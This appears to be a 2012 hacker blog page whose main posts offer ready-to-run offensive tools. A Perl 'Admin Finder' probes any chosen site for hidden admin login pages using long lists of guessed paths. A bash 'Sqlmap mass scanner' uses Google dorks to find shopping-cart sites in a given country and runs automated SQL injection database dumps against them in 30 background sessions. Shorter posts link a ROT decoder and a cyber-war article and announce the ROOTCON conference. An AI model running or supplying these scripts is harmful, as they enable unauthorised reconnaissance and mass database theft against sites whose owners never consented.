Thursday, May 24, 2012

Perl Admin Finder


#!/usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

system('clear');



print"\n";
print "===========================================================\n" ;
print "-----------------------------------------------------------\n" ;
print "=-=-=-=-=-=- Admin Finder 2.0 =-=-=- By Kouback_TR_ ==-=-=-\n" ;
print "=-=-=-=-==-==-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-\n" ;
print "-----------------------------------------------------------\n" ;
print "===========================================================\n" ;
print "\n";

print "[!] Informe o site que deseja realizar o scan\n* USE EXEMPLO: www.googel.com ou www.google.com/sub\n-> ";

$site=<STDIN>;

chomp $site;



print "\n";
print "[!] Informe a linguagem usada pelo site $site \n*[DISPONIVEIS~ asp, php, cfm, html ou todos\n-> ";
$code=<STDIN>;
chomp($code);



if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}

print "\n";
print "OK scaneando site ~ $site\n";
print "OK usando linguagem ~ $code\n";
print "BUNCANDO PAGINAS DE LOGIN !\n\n\n";



if($code eq "asp"){


@path1=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp','admin/home.asp','admin/controlpanel.asp','admin.asp','admin/cp.asp','cp.asp',
'administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp',
'moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','admin_login.asp','panel-administracion/login.asp',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.asp','adminpanel.asp','webadmin.asp','pages/admin/admin-login.asp','admin/admin-login.asp',
'webadmin/index.asp','webadmin/admin.asp','webadmin/login.asp','user.asp','user.asp','admincp/index.asp','admincp/login.asp','admincp/index.asp',
'admin/adminLogin.asp','adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','admin/admin_login.asp',
'admincontrol/login.asp','adm/index.asp','adm.asp','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.asp'

);



foreach $ways(@path1){



$final=$site.$ways;


my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

print "[-]Ops.. Not Found <~ $final\n";

}

}

}


# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------

if($code eq "cfm"){



@path1=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin_area/index.cfm','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin/controlpanel.cfm','admin.cfm','admin/cp.cfm','cp.cfm',
'administrator/index.cfm','administrator/login.cfm','administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm',
'moderator/login.cfm','moderator/admin.cfm','account.cfm','controlpanel.cfm','admincontrol.cfm','admin_login.cfm','panel-administracion/login.cfm',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm',
'webadmin/index.cfm','webadmin/admin.cfm','webadmin/login.cfm','user.cfm','user.cfm','admincp/index.cfm','admincp/login.cfm','admincp/index.cfm',
'admin/adminLogin.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','admin/admin_login.cfm',
'admincontrol/login.cfm','adm/index.cfm','adm.cfm','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.cfm'

);

foreach $ways(@path1){

$final=$site.$ways;



my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);



if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

print "[-]Ops.. Not Found <~ $final\n";

}

}

}



# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------





if($code eq "php"){



@path2=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin_area/index.php','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php',
'bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin/controlpanel.php','admin.php','admin/cp.php','cp.php',
'administrator/index.php','administrator/login.php','administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php',
'moderator/login.php','moderator/admin.php','account.php','controlpanel.php','admincontrol.php','admin_login.php','panel-administracion/login.php',
'admin/home.php','admin/controlpanel.php','admin.php','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','admin/cp.php','cp.php',
'administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php','moderator/login.php','administrator/login.php',
'moderator/admin.php','controlpanel.php','admin/account.php','adminpanel.php','webadmin.php','pages/admin/admin-login.php','admin/admin-login.php',
'webadmin/index.php','webadmin/admin.php','webadmin/login.php','user.php','user.php','admincp/index.php','admincp/login.php','admincp/index.php',
'admin/adminLogin.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admin/admin_login.php',
'admincontrol/login.php','adm/index.php','adm.php','admincontrol.php','admin/account.php','adminpanel.php','webadmin.php','webadmin/index.php',
'webadmin/admin.php','webadmin/login.php','admin/admin_login.php','admin_login.php','panel-administracion/login.php','adminLogin.php',
'admin/adminLogin.php','home.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','admin-login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','administrator/index.php',
'admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php',
'adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.php'

);


foreach $ways(@path2){

$final=$site.$ways;



my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

print "[-]Ops.. Not Found <~ $final\n";

}

}

}


# -------------------------------------------------------
#----------------------test html------------------------|
# -------------------------------------------------------





if($code eq "html"){



@path3=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.html','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.html','admin/controlpanel.html','admin.html','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','admin/cp.html','cp.html',
'administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html','moderator/login.html','administrator/login.html',
'moderator/admin.html','controlpanel.html','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.html','user.html','admincp/index.html','admincp/login.html','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html',
'webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','adminLogin.html',
'admin/adminLogin.html','home.html','admin.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html','admin-login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','administrator/index.html',
'admincontrol/login.html','adm/admloginuser.html','admloginuser.html','admin2.html','admin2/login.html','admin2/index.html','adm/index.html',
'adm.html','affiliate.html','adm_auth.html','memberadmin.html','administratorlogin.html','siteadmin/login.html','siteadmin/index.html','siteadmin/login.html'

);


foreach $ways(@path3){

$final=$site.$ways;



my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

print "[-]Ops.. Not Found <~ $final\n";

}

}

}




# -------------------------------------------------------
#----------------------test todos------------------------|
# -------------------------------------------------------





if($code eq "todos"){



@path3=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.html','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.html','admin/controlpanel.html','admin.html','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','admin/cp.html','cp.html',
'administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html','moderator/login.html','administrator/login.html',
'moderator/admin.html','controlpanel.html','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.html','user.html','admincp/index.html','admincp/login.html','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html',
'webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','adminLogin.html',
'admin/adminLogin.html','home.html','admin.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html','admin-login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','administrator/index.html',
'admincontrol/login.html','adm/admloginuser.html','admloginuser.html','admin2.html','admin2/login.html','admin2/index.html','adm/index.html',
'adm.html','affiliate.html','adm_auth.html','memberadmin.html','administratorlogin.html','siteadmin/login.html','siteadmin/index.html','siteadmin/login.html','admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin_area/index.php','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php',
'bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin/controlpanel.php','admin.php','admin/cp.php','cp.php',
'administrator/index.php','administrator/login.php','administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php',
'moderator/login.php','moderator/admin.php','account.php','controlpanel.php','admincontrol.php','admin_login.php','panel-administracion/login.php',
'admin/home.php','admin/controlpanel.php','admin.php','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','admin/cp.php','cp.php',
'administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php','moderator/login.php','administrator/login.php',
'moderator/admin.php','controlpanel.php','admin/account.php','adminpanel.php','webadmin.php','pages/admin/admin-login.php','admin/admin-login.php',
'webadmin/index.php','webadmin/admin.php','webadmin/login.php','user.php','user.php','admincp/index.php','admincp/login.php','admincp/index.php',
'admin/adminLogin.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admin/admin_login.php',
'admincontrol/login.php','adm/index.php','adm.php','admincontrol.php','admin/account.php','adminpanel.php','webadmin.php','webadmin/index.php',
'webadmin/admin.php','webadmin/login.php','admin/admin_login.php','admin_login.php','panel-administracion/login.php','adminLogin.php',
'admin/adminLogin.php','home.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','admin-login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','administrator/index.php',
'admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php',
'adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.php','admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp','admin/home.asp','admin/controlpanel.asp','admin.asp','admin/cp.asp','cp.asp',
'administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp',
'moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','admin_login.asp','panel-administracion/login.asp',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.asp','adminpanel.asp','webadmin.asp','pages/admin/admin-login.asp','admin/admin-login.asp',
'webadmin/index.asp','webadmin/admin.asp','webadmin/login.asp','user.asp','user.asp','admincp/index.asp','admincp/login.asp','admincp/index.asp',
'admin/adminLogin.asp','adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','admin/admin_login.asp',
'admincontrol/login.asp','adm/index.asp','adm.asp','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.asp','admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin_area/index.cfm','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin/controlpanel.cfm','admin.cfm','admin/cp.cfm','cp.cfm',
'administrator/index.cfm','administrator/login.cfm','administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm',
'moderator/login.cfm','moderator/admin.cfm','account.cfm','controlpanel.cfm','admincontrol.cfm','admin_login.cfm','panel-administracion/login.cfm',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm',
'webadmin/index.cfm','webadmin/admin.cfm','webadmin/login.cfm','user.cfm','user.cfm','admincp/index.cfm','admincp/login.cfm','admincp/index.cfm',
'admin/adminLogin.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','admin/admin_login.cfm',
'admincontrol/login.cfm','adm/index.cfm','adm.cfm','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.cfm'

);


foreach $ways(@path3){

$final=$site.$ways;



my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

print "[-]Ops.. Not Found <~ $final\n";

}

}

}

Online ROT Encoder / Decoder

Here is a link to my favorite ROT Encoder / Decoder that allows you to rotate the numbers as well:

http://theblob.org/rot.cgi

Enjoy :)

Tuesday, May 15, 2012

The History of the China - Philippine Cyber War

Hey guys, it's been a long time since I haven't updated this blog and so I decided to write just a simple link back to my article that I wrote for Infosec Institute which is about Understanding the Origins of the China – Philippine Cyber War. I wrote this article for general purposes because I  have been following the spark of their retaliation and that the media is doing it all wrong about giving some information about  its history.

Check it out :)

Regards,

shipcode

PS: I will be busy updating The ProjectX Blog, ROOTCON Blog and will be actively contributing articles to Infosec Institute.

Monday, March 12, 2012

Hacker Conference in the Philippines == ROOTCON


 ROOTCON 6 which is the premier hacker conference in the Philippines is back again and will be held on September 7-8, 2012 at Cebu Parklane International Hotel.

ROOTCON comes from the two words “ROOT” (super user on Unix systems) and “CON” (conference). ROOTCON operation started 27-December-2008, registered as DEFCON Group 6332, and carried the name DEFCONPH. The group held two small gatherings under DEFCONPH – known as the BeerTalks.

After the two consecutive gatherings, DEFCON brought up their copyright protection concerns, having observed that the Philippine Hacker and InfoSec group was carrying a name very similar to theirs.

DEFCONPH was then renamed PinoyGreyHat, under which one conference was held before the founder finally decided to rebrand to a more neutral and conference-friendly name: ROOTCON. The name was officially changed on 09-August-2010.

With the same crew and team on board, ROOTCON is still the premier hacking conference in the Philippines. ROOTCON is open to everyone. Previous participants have included InfoSec personnel, developers, businessmen, students, lawyers, feds, and the like.

So what to expect from this con?

1. Awesome talks like Information Security, Web Application Attacks, Cyber Warfare, Cyber Crime, Lock picking, Vulnerability Discovery, Wireless Attacks, Reverse Engineering, Malware, Security Tools, Patch Management, Tools 101 (Metasploit, Nmap, etc.), and many more.

2. Cool activities like Hackista Challenge (CTF), Hacker Jeopardy, H4XØR BBQ, WiFi Shootout, WiFi Warrior (WiFi Cracking), beer drinking, and many more.

3. Meet new friends and old friends.

4. Receive ROOTCON swags and souvenirs.

5. /etc

So what do you need to do? Just get ready and be prepared for ROOTCON 6 Registration will be opened soon!

LINKS

Website: https://www.rootcon.org/

Blog: http://blog.rootcon.org/

Forum: http://forum.rootcon.org/

Activities: https://www.rootcon.org/xml/rootcon6/activities

Saturday, February 11, 2012

Sqlmap automatic scanner by wer0ckz

Here is a bash script shell made by wer0ckz who is also one of the bloggers of The ProjectX Blog:

#!/bin/bash
# [*]
# [*] Sqlmap automatic scanner by wer0ckz
# [*] This tool is designed to scan sql injection by country specific together with shopping sites targets
# [*] It creates 30 screens with sqlmap running
# [*]
clear
echo -n “Enter country (ex. ca, au, ph): ”
read -e COUNTRY
if [ -d $COUNTRY ]
then echo Country $COUNTRY is here. Exit!
else
echo “[*] Sqlmap mass scanner by wer0ckz”
echo “[*]”
echo “[*] Downloading Sqlmap..”
echo “[*]”
echo “[*]”
wget -nv http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz
tar zxf sqlmap-0.9.tar.gz
mv sqlmap $COUNTRY
rm ${COUNTRY}/lib/utils/google.py
echo “[*]”
echo “[*] Updating google scanner..”
wget -nv https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/utils/google.py
mv google.py ${COUNTRY}/lib/utils/google.py
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop buy” –dbs –batch
